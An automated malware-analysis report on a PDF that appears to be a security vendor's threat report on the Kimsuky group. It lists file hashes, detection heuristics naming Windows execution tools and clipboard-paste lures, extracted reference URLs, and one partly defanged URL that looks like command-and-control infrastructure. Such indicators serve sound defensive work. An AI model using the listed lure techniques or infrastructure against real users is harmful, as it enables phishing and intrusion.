Malicious PDF — malware analysis report

Static analysis result for SHA-256 da7d584d69e037a5…

MALICIOUS

PDF

4.80 MB Authoring application: Skia/PDF m120 Google Docs Renderer First seen: 2023-11-20
MD5: 012932bdba4ac0313f09c30046f55611 SHA-1: 7c4e37e0a733b5e8f0f723cca2a9675901527dc4 SHA-256: da7d584d69e037a5b3cf3ef90fd5304bbaac72c0d78a99484def8a081b373f10
84 Risk Score

Machine Learning

  • Nyx PDF Classifier clean score 0.0009

Heuristics 4

  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • External URI info PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.genians.co.kr In PDF document text
    • http://cainnick002.000webhostapIn PDF document text
    • http://cainnick002.000webhostapp[.]com/nick/show.php?query=50In PDF document text
    • https://www.genians.co.kr/products/genian-edr/In PDF document text
    • https://gist.github.com/geoffgarside/c28816a48516794095b96dcc5944ad25In PDF document text
    • https://www.genians.co.kr/products/genian-edrIn PDF document text
    • https://www.genians.co.kr/blog/darkhorseIn PDF document text
    • https://www.igloo.co.kr/security-information/2021%EB%85%84-%EC%83%81%EB%B0%98%EA%B8%B0-kimsuky-%EA%B3%B5%EA%B2%A9-%EB%8F%99%ED%96%A5/In PDF document text
    • https://blog.alyac.co.kr/3033In PDF document text
    • https://blog.alyac.co.kr/2299In PDF document text
    • https://blog.alyac.co.kr/2243In PDF document text
    • https://attack.mitre.org/tactics/enterprise/In PDF document text
    • https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3413621/us-rok-agencies-alert-dprk-cyber-actors-impersonating-targets-to-collect-intell/PDF link annotation
    • https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/In PDF document text
    • https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_ProceduresIn PDF document text
    • https://malpedia.caad.fkie.fraunhofer.de/actor/kimsukyIn PDF document text
    • https://en.wikipedia.org/wiki/Zoho_CorporationIn PDF document text
    • https://www.cloudns.net/In PDF document text
    • https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanksIn PDF document text
    • https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92In PDF document text
    • https://kr.sentinelone.com/wp-content/uploads/pdf-gen/1684815806/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit.pdfIn PDF document text
    • https://dumah7.wordpress.com/2009/02/17/kel-chm-creator-v-1-4-0-0/In PDF document text
    • https://ericzimmerman.github.io/#!index.mdIn PDF document text
    • https://learn.microsoft.com/ko-kr/windows/win32/amsi/antimalware-scan-interface-portalIn PDF document text
    • https://attack.mitre.org/techniques/T1598/002/In PDF document text
    • https://attack.mitre.org/techniques/T1598/003/In PDF document text
    • https://attack.mitre.org/techniques/T1585/002/In PDF document text
    • https://attack.mitre.org/techniques/T1566/002/In PDF document text
    • https://attack.mitre.org/techniques/T1566/003/In PDF document text
    • https://attack.mitre.org/techniques/T1059/001/In PDF document text
    • https://attack.mitre.org/techniques/T1059/003/In PDF document text
    • https://attack.mitre.org/software/S0414/In PDF document text
    • https://attack.mitre.org/In PDF document text
    • https://attack.mitre.org/techniques/T1059/005/In PDF document text
    • https://attack.mitre.org/techniques/T1204/002/In PDF document text
    • https://attack.mitre.org/techniques/T1547/001/In PDF document text
    • https://attack.mitre.org/techniques/T1070/004/In PDF document text
    • https://attack.mitre.org/techniques/T1140/In PDF document text
    • https://attack.mitre.org/techniques/T1218/001/In PDF document text
    • https://attack.mitre.org/techniques/T1057/In PDF document text
    • https://attack.mitre.org/techniques/T1082/In PDF document text
    • https://attack.mitre.org/techniques/T1083/In PDF document text
    • https://attack.mitre.org/techniques/T1518/001/In PDF document text
    • https://attack.mitre.org/techniques/T1071/001/In PDF document text
    • https://attack.mitre.org/techniques/T1041/In PDF document text
    • https://asec.ahnlab.com/ko/48960/In PDF document text
    • https://medium.com/s2wblog/unveil-the-evolution-of-kimsuky-targeting-android-devices-with-newly-discovered-mobile-malware-280dae5a650fIn PDF document text
    • https://asec.ahnlab.com/ko/34383/In PDF document text
    • https://asec.ahnlab.com/ko/32685/In PDF document text
    • https://asec.ahnlab.com/ko/31481/In PDF document text
    +5 more URL(s)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_000_off00000238.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x238 4194304 bytes
SHA-256: 0b52394e43a06e855057f8231fc5292e0fa9577dbdf03abe4c73687bbfc96f47
stream_013_off0049ddbc.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x49DDBC 293104 bytes
SHA-256: 88f213fc9c87736ceea710cdfa495da27a9dac846cca9cf5091fd289c712bb22
font_01_sfnt_off004bbc00.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x4BBC00 104208 bytes
SHA-256: a578d40fd90f197319caedace197957b7fc904deaa60289b04dbb27d07c50297
font_02_sfnt_off004c5d58.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x4C5D58 30100 bytes
SHA-256: 71c0dd255160ae80ee5819487225feeb1e6b1c332f156c6c9aa7dc3365636d6f
font_03_sfnt_off004c8987.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x4C8987 352760 bytes
SHA-256: 44808c6ee191bec2cef6c2dd33c03e589e9f1b1d30a24bad47b4964ec44a66cc